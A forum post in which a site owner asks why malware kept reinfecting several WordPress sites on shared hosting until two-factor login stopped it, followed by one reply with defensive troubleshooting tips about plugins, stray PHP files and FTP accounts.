January 22, 2021

Trying to figure out a wordpress hack

Shared server. Multiple wordpress installations. All hacked with malware that changes all themes to open a random ad based site.

Changed cpanel password, WP passwords, clean installed all WP sites. Malware comes back within a week to all of them or at least 50% of them.

Tried all manner of security plugins and htaccess rules. Server logs, that I could access, showed nothing too suspicious. No logins aside from me.

Finally tried 2 factor and everything stopped. There were quite a few attempted logins using for the first few days but all stopped due to 2 factor. Banned the ips and of course they tried again with the right user name but the 2 factor stopped them.

I’m trying to figure out how they kept getting in so easily even after clean installs, new passwords and even lockouts after 3 bad passwords.

2 Factor stopped them. I can only think it was brute force but the 3 attempts and your out should have stopped that. The only other thing I can think of is that it was server malware, but again, the 2 factor wouldn’t have matter then.

Anyone else have ideas on how they were able to get in before 2 factor given the above?

Comments

eddyht

Is wordpress and all of the plugins up to date? It could be a vulnerability with one of the plugins. Also it’s good practice to review all of the pho files on the public directory. Sometimes malicious files are uploaded to allow for persistent access after wordpress is gone.

Another area to check is ftp accounts in cpanel. See if any accounts that you didnt create are there.

Leave a Reply

Your email address will not be published. Required fields are marked *

Note: By filling this form and submitting your commen, you acknowledge, agree and comply with our terms of service. In addition you acknowledge that you are willingly sharing your email address with AiOWikis and you might receive notification emails from AiOWikis for comment notifications. AiOWiksi guarantees that your email address WILL NOT be used for advertisement or email marketting purposes.

This site uses Akismet to reduce spam. Learn how your comment data is processed.